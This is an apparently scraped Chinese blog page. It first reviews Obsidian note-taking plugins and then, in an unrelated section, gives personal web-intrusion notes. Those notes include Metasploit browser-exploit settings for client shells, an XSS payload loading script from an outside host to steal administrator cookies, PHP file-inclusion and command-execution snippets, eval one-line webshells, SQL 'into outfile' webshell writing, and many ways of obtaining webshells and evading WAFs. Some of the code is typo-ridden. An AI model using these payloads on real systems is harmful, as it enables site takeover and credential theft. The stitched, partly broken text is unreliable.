笔记工具合集

Posted 个人渣记录仅为自己搜索用

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了笔记工具合集相关的知识,希望对你有一定的参考价值。

在csdn上留了太多的垃圾东西,是时候把笔记功能转移了,csdn以后只是用来发表干货.

笔记:

1. 大一统笔记,

   Obsidian 你搜索 "Obsidian 绘图" 和 "Logseq 绘图" 就知道选择啥了.

   评测来自:  双链笔记软件综合评测:Roam Research、 Obsidian、Logseq、思源笔记 、Roam Edit 、RemNote、葫芦笔记、TiddlyWiki、Athens、Trilium

2. 双链的本质

    1. 用法1 是父主题和子主题之间的双链. (所有的脑图串成脑图). 一个文章可能是多父主题的, 同样可以.

         结合"Note Refactor" 可以实现文章的结构化整理 , 先有细节再有文章主题,个人学习的沉淀大抵如此, 出书或者教人做事是基于此后,先有大纲再让对方来填充.
        进一步可以利用此
   2. 用法2 标签用法. 类似 已读未读. 术语标注(双链之前已经有关键词自动链接技术)

   3. 结合如上两种做法实现, 一个静态网站的功能.

3. 知识的本质 树状结构化 

from 空谷 : 可能会有人惊叹我在构建《价值投资系统》中的结构化思路,要知道这背后是我 8 年以来, 10+大领域,100+小领域,4000+笔记的分类训练之后才形成的能力。

那什么是「知识体系」?「知识体系」是对真实世界的客观描述,这是需要不断被抽象,构建,重组的知识。

我们都知道思维是网状的,这句话没错,但是把这句话用在知识管理上,我觉得有失偏颇。因为思维与知识完全不等价。因为知识反应了客观,而思维则是主观。我一直认为严谨的知识一定是树状、结构化的。而应用知识的过程则是网状。这也分别映射了「知识体系」和「应用笔记」的特点。

* Obsidian的同步

     详见"Obsidian全平台同步策略"

3. Obsidian的插件
     Obsidian 插件之 Excalidraw
     在 Obsidian 中实现数据绘图 ( 使用plotly插件实现将数据绘图嵌入到markdown笔记中。)
4. Obsidian的文章重构

     Note Refactor
5.

其他插件: 拒绝折腾伪需求,我最爱用的 Obsidian 实用插件推荐。

漫游笔记: 每次点击后会随机出现你的一篇笔记,就是这么个简单的功能。

Customizable Menu & ToolBar & Page Header and Title Bar:

  1. Menu:右键菜单
  2. ToolBar:边栏
  3. Page Header and Title Bar:Obsidian 上边栏和标题栏

Advanced Tables: Advanced Tables所见即所得的表格

Media Extended & Media Extended BiliBili Plugin:

Mind Map

Privacy Glasses: 可以为你遮蔽除了鼠标光标所在处以外的所有信息,让你在任何环境不必担心重要信息被看到,已经更自在地码字。

  • Copy button for code blocks:为代码块增加一个复制按钮
  • Hider:隐藏字数统计、滚动栏、上边栏、侧边栏
  • Advanced Appearance:更好看的外观
  • Outliner:优化项目清单使用体验,例如 cmd + A 会选择当前项目而非全文
  • Collapse All:增加折叠所有文件夹的按钮
  • Footnote Shortcut:使用快捷键意见生成自动编号的脚注,并将光标切换到末尾写脚注
  • Better footnote:鼠标放在脚注上直接显示脚注内容

其他漏洞笔记合集

xss跨站漏洞纯手打笔记(基础)

 XSS漏洞扫描
常用工具:
wvs
椰树
safe3
Xelenium
w3af
vega
xss扫描插件+burp
 
 
Beef:
 
beef+msf拿客户端shell(ie6 xp)
use windows/browser/ms10_002_aurora
 
set PAYLOAD windows/meterpreter/reverse_tvp PAYLOAD =>wondows/meterpreter/reverse_tcp
 
set SRVHOST (my ip)
 
set SRVPORT 7777
 
set URIPTH /
 
set LHOST(MY IP)
 
set LPORT 4444(端口)
 
cxploit
 
 
beef+msf拿客户端shell(ie7.8.9)
use exploit windows/browser/ie_execcommand_uaf
 
show options
 
set SRVHOST (my ip)
 
set SRVPORT 8888(端口)
 
set URIPATH /
 
cxploit
 
 
留后门:
</textarea>‘"><script src=http://webxss.cn/1kDF43?1444052356></script>;;
写入管理员登录页面
永久劫持管理员cookie
 
xss平台搭建:
 
使用工具:
wamp2.2+xss.me源码
 
 
文件包含漏洞:利用条件
1.include()等函数通过变量的方式引入需要包含的文件
2.用户能控制该动态变量
文件包含漏洞是代码注入的一种,原理就是注入一段用户能控
制的脚本或代码,并让服务器端执行,代码注入的典型代表就
是文件包含file  inclusion。文件包含可能会出现在jsp php 
asp等语言中,常见的导致文件包含的函数如下:
 
php:
include(),include_once(),require(),require_once
 
(),fopen(),readfile().....
 
当使用者4个函数包含一个新文件时,该文件将作为php代码执行,php内核并不在意该被包含的文件是什么类型,
<?ph$test=$_GET["x"];inxlude($test);?>保存为include.php
在同一个目录下创建为test.tst内容为<?php phpinfo()?>
访问链接,将xx.txt传送给c并赋予test变量
 
远程文件包含:
如果php的配置选项allow_url_include为on,则
 
include/require函数是可以加载远程文件的,这种漏洞被称
 
为远程漏洞(RFI)
代码:
<?php$test=$_GET["c"];include($test);?> 保存为
 
include.php
 
 
 
JSP/Servlet:ava.io.file(),java.io.filereader()....
 
 
ASP:include file,include virtual....
 
 
本地文件包含漏洞利用技巧:
1.包含用户上传的文件
用户上传的文件内容中如果包含了php代码,那么这些代码被
 
include()加载后将会被执行
 
2.包含日志文件,比如Web Server的access Log.
同过构造与句让服务器报错并将一句话虽报错信息写入日志,
 
找到日志文件,用菜刀链接,拿下网站。
 
3.包含data://或者php://input等伪协议
 
4.包含了Session文件
 
 
实验:ekucms2.5》制作错误,写入一句话木马》
 
 
($_POST[x])}
 
命令注入漏洞:
php命令执行函数:
在php中可以使用下列5个函数来执行外部的应用程序或函数
1.system:执行一个外部的应用程序并显示输出的结果
system函数:
原型:string system(string command,int &return_var)
其中,command
是要执行命令, return_var存放执行命令的执行后的状态值
同样,构造php代码如下:
 
<?php $cmd = $_GET["cmd"]echo"<pre>";system
 
($cmd);echo"</pre>";?>
 
在浏览器中访问这个php文件,并提交cmd的内容为"net 
 
start" 黑客目的是通过命令注入攻击查看web服务器主机都开
 
启了那些服务
 
2.exec:执行一个外部的的应用程序
函数原型如下:
string exec (string command,array &output,int 
 
&return_var)其中,command是执行的命令,output是获得执行
 
命令输出的每一行字符串,returm——var存放执行命令后的
 
状态值
构造php代码如下:
 
<?php $x=$_GET["x"];echo shell_exec($x);?>
 
 
3.passthru:执行一个UNIX系统命令并显示原始的输出
Passthru函数以用来执行一个UNIX系统命令并显示原始的输出
 
,当unix系统命令的输出是二进制的数据,并且需要直接返回
 
值给浏览器时,需要使用passthru函数来代替system与exec函
 
数。
passthru函数原型如下:
 
void passthru (string command,nit &returm_var)
 
其中,command是要执行的命令,returm_var存放执行命令后
 
的状态值
构造php代码如下:
 
<? $cmd = $_GET["cmd"]echo"<pre>";system
 
($cmd);echo"</pre>";?>
 
 
4.shell_exec:执行shell命令并返回输出的结果的字符串
函数原型如下:
 
string shell_exec(string command)
其中,command是要执行的命令
代码如下:
 
<? $cmd = $_GET["cmd"];echo "<pre>";sehll_exec
 
($cmd);echo "</pre>";?>
 
5. "‘‘"运算符:与shell_exec函数的功能相同
 
 
 
变量覆盖漏洞:
产生:变量如果没有初始化,而且能被用户控制,
在php中,若register_globals为on(启用)时非常严重
此为全局变量覆盖漏洞
 
代码:
<?php 
$x="xxx";
$y="seven";
echon $x;
echon "<hr>";
echon $y;
echon "<hr>";
$y=$_GET["x"];
echon $y
?>
 
下载漏洞:
利用:通过蜘蛛爬行,找到该url,下载 conn.asp  config.php config.asp db.ndb
(谷歌黑客:/down.asp?fileup=)
 
webshell:
 
爆破webshll密码:
burpsuite
webshell密码爆破器
 
 
 
拿webshell方法总结:
管理权限拿:
 
14种常见的:
1.正常上传:网站对上传文件后缀格式并为过滤,直接上传webshell就可以。(不限制上传类型,可随意上传伪装的木马)
 
2.数据库备份拿:网站对上传的文件后缀进行过滤,不允许上传脚本类型文件,如:asp php jsp aspx等。而网站具有数据库备份功能,这时我们就可以将webshell格式先改为允许上传的文件格式如:jpg gif等。然后,我们找到上传后的文件路径,通过数据库备份,将文件备份改为脚本格式。
 
3.本地js验证突破拿webshell:当网站设置了js来限制文件类型时,我们可以通过删除js验证或者修改上传类型突破上传拿webshell,使用burpsuite或者fiddle
等代理工具提交,本地文件先改为jpg,上传时拦截,在把文件扩展名改为asp或者php即可。
 
4.上传其他脚本类型拿webshell:这种类型用于一台服务器具有多个网站,a网站是asp的站,b可能是php的站,a中限制了上传文件类型为asp的文件,你可以尝试上传php的脚本来拿webshell。
 
5.(和编辑器配合)利用解析漏洞拿wbeshell:(常见的编辑器fckeditor,ewebeditor,cheditor)
IIS 5.x/6.0解析漏洞
IIS 7.0/IIS 7.5/ Nginx <8.03畸形漏洞
Nginx <8.03 空子节代码执行漏洞
Apache解析漏洞
 
6.网站配置插马拿webshell:通过找到网站默认配置,讲一句话查到网站配置中,不过为了能成功执行插马,建议先下载该网站源码,进行查看源码过滤规则,防止插马失败;
"%><%eval request("hydra")%><%"(闭合一句话)
 
7.通过编辑模板拿webshell:通过网站的模板进行编辑写入一句话,然后生存脚本文件拿webshell,或者通过将木马添加到压缩文件,把名字改为网站模板类型,上传到网站服务器,拿webshell。(有的网站可以修改添加脚本文件,直接拿swebshell)
 
8.数据库命令执行拿webshell:可以通过phpmyadmin登录数据库命令来写一句话拿webshell。
Hydra TABLE study (cmd text NOT NULL)
Insert INTO study (cmd) VALUES(‘<?php eval ($_POST[cmd])?>‘)
select cmd feom study into outfile‘D:/php/www.htdocs/test/seven.php‘
Drop TABLE IF EXISTS study
 
9.通过静态页面拿webshell:通过对网站的模板进行编辑写入一句话,然后生成脚本文件拿
也通过将木马添加到压缩文件,把名字改为网站模板类型上传到网站服务器拿
 
10.(上传特殊马拿webshell:一些网站安装了waf安全狗,360,我们可以通过上传一些免杀马,变形马来进行突破封杀。)文件包含拿webshell:先将webshell改为txt文件上传,然后上传一个脚本文件包含该txt文件,可以绕过waf,
asp包含:<!--#indude file="xx.jpg"--> 调用的文件必须和被调用文件在同一目录,否则找不到,绕过在不同的目录下,用下面的语句:<!--#indude virtual="文件所在目录/xx.jpg">
 
php包含:
<?php
indude("xx.jpg");
?>
 
 
普通权限拿webshell:
 
1.0day拿webshell:这个不多说。可以去网上搜索一些,比如你找到你搞的网站cms是discz的,你可以搜索一些相关0day直接拿
 
2.修改网站上传类型配置拿webshell:有的网站,在网站上传类型中限制了上传脚本类型文件,我们可以通过添加文件上传类型,如天剑 asp php jpg aspx asa来拿webshell。(非常老的方法不过有的网站还是存在。如果运气好可以碰到)
 
3.IIS写权限拿webshell:比较少见,有专门的利用工具,原理是通过找到有iis写入权限的网站,put进去一个txt的文件,目录必须有刻写的权限,如image文件夹,然后通过move方法,把txt格式的木马move成脚本格式,如一开始上传的是xx.txt move成xx.asp。
 
4.通过远程命令执行拿webshell:关于命令执行,php程序相对来说比较多见,可以通过执行一些系统命令进行拿webshell。
 
5.strusts2拿webshell:网上有工具可以直接拿。(这种漏洞凤毛菱角,几乎灭绝了)
 
6.通过用户头像上传拿webshell(Ps:需要抓包改包):用户注册后有些网站可以上传图片,附件,文件等,可以利用上传拿webshell。
 
7.通过注入漏洞拿webshell:要有足够的权限,对写入木马的文件夹有写入权限,知道网站绝对路径。
对于MySQL注入漏洞网站可以通过log备份,差异备份拿webshell。也可以通过into file 函数将一句话木马写入拿webshell,还可以利用phpmyadmin 将木马导出拿webshell。

以上是关于笔记工具合集的主要内容,如果未能解决你的问题,请参考以下文章

实用工具和网站合集分享

实用工具和网站合集分享

实用工具和网站合集分享

笔记cookies管理工具类

Rhino Grasshopper 参数化建模 资源合集

Rhino Grasshopper 参数化建模 资源合集